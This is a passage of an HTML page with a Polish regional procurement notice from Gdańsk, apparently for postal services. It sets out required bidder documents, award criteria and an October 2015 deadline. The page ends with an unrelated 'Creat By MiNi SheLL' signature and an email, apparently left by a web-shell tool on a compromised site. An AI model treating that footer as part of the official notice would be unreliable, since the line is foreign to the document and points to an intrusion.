Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdz. VI ust. 1 pkt 1) SIWZ (wzór oświadczenia stanowi załącznik nr 2  do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdz. VI ust. 1 pkt 1) SIWZ (wzór oświadczenia stanowi załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdz. VI ust. 1 pkt 1) SIWZ (wzór oświadczenia stanowi załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdz. VI ust. 1 pkt 1) SIWZ (wzór oświadczenia stanowi załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>4.	Udział w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku spółki cywilnej Zamawiający, w rozumieniu art. 2 ust. 11 ustawy przyjmuje, że wykonawcami są wspólnicy spółki cywilnej, których udział w postępowaniu traktowany jest jako wspólne ubieganie się o udzielenie zamówienia w rozumieniu art. 23 ust. 1 ustawy,
2)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania w postępowaniu 
i zawarcia umowy w sprawie niniejszego zamówienia publicznego,
3)	Wykonawcy, o których mowa w pkt 1), ponoszą solidarną odpowiedzialność za wykonanie zamówienia,
4)	Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi złożyć dokumenty,
o których mowa w rozdziale VI  ust. 2 pkt 1)-2) oraz w ust. 3,
5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia złożą łącznie Formularz oferty oraz jeden komplet dokumentów, o których mowa w ust. 1 pkt 1)-2). Dokumenty te powinny być przygotowane w taki sposób, aby Zamawiający mógł dowiedzieć się, jaki udział w wykonaniu zamówienia będzie miał każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
6.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 2 pkt 2) - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
7.	Dokumenty, o których mowa w ust.  6 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8.	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 6, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy,  złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Do aktualności tego dokumentu mają odpowiednie zastosowanie zapisy ust.  7.
9.	Dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę - z wyjątkiem dokumentów wskazanych w ust. 10 niniejszego rozdziału. Dokumenty sporządzone w języku obcym należy składać wraz z tłumaczeniem na język polski.
10.	Dokumenty, o których mowa w niniejszym rozdziale w ust. 1 pkt 1 oraz
ust. 3  muszą być złożone w oryginale lub kserokopii poświadczonej notarialnie.
11.	Zgodnie z art. 26 ust. 2b ustawy Wykonawca może polegać na wiedzy
i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia,  w  szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
12.	Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z ust. 11, odpowiada solidarnie 
z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
13.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz 
w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów muszą być poświadczone za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.
14.	Brak jakiegokolwiek z dokumentów wymaganych w SIWZ, lub złożenie dokumentu  
w niewłaściwej formie spowoduje wykluczenie Wykonawcy z postępowania oraz uznanie jego oferty za odrzuconą,  z zastrzeżeniem ust. 15 niniejszego rozdziału.
15.	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów potwierdzające spełnienie:
a)	warunków udziału w postępowaniu,
b)	wymagań określonych przez Zamawiającego, 
lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w pkt a) i b), zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - liczba podjętych przez Wykonawcę zawiadomień o próbie doręczenia przesyłki adresatowi - 10</li>
<li>3 - czas reakcji na wezwanie - 10</li>
<li>4 - czas udzielenia informacji o poprawności nadania listu od momentu odbioru poczty - 10</li>
<li>5 - czas zwrotu do Zamawiającego błędnie oznaczonej przesyłki - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>6.	Wszelkie zmiany zawartej umowy będą wymagały pisemnego aneksu pod rygorem nieważności.
7.	Istotne zmiany postanowień Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru  Wykonawcy mogą dotyczyć:
1)	zmiany warunków i terminów płatności,
2)	zmiany sposobu realizacji zamówienia, jeśli rozwiązania zaproponowane przez Zamawiającego lub Wykonawcę przyczynią się do uzyskania wyższej jakości końcowej zamówienia, przy czym zmiana ta nie będzie miała wpływu na wysokość wynagrodzenia Wykonawcy.
8. Zmiany, o których mowa w ust. 7 mogą nastąpić w przypadku:
1)	wystąpienia siły wyższej. Pod pojęciem siły wyższej Zamawiający rozumie okoliczności, które pomimo zachowania należytej staranności są nieprzewidywalne oraz, którym nie można zapobiec lub przeciwstawić się skutecznie,
2)	w przypadku zmiany przepisów krajowych lub unijnych dotyczących obrotu pocztowego,
3)	gdy zmiany te są korzystne dla Zamawiającego,
4)	gdy zmiany te spowodowane są zmianami organizacyjnymi Zamawiającego (między innymi zmiany związane z wprowadzeniem nowego programu elektronicznego obiegu dokumentów, zmiany organizacji pracy kancelarii).
9. Wykonawca wnioskujący o zmianę Umowy, przedłoży Zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pomorskie.eu/Article/id,12.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Departament Zamówień Publicznych i Administracji ul. Okopowa 21/37, 80-810 Gdańsk, pokój 133 G..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2015 godzina 10:00, miejsce: Kancelaria Ogólna Urzędu Marszałkowskiego Województwa Pomorskiego ul. Okopowa 21/27, 80-810 Gdańsk, pokój nr 4a (czynna w dni robocze: od poniedziałku do piątku od godz. 7:45 do godz. 15:45)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com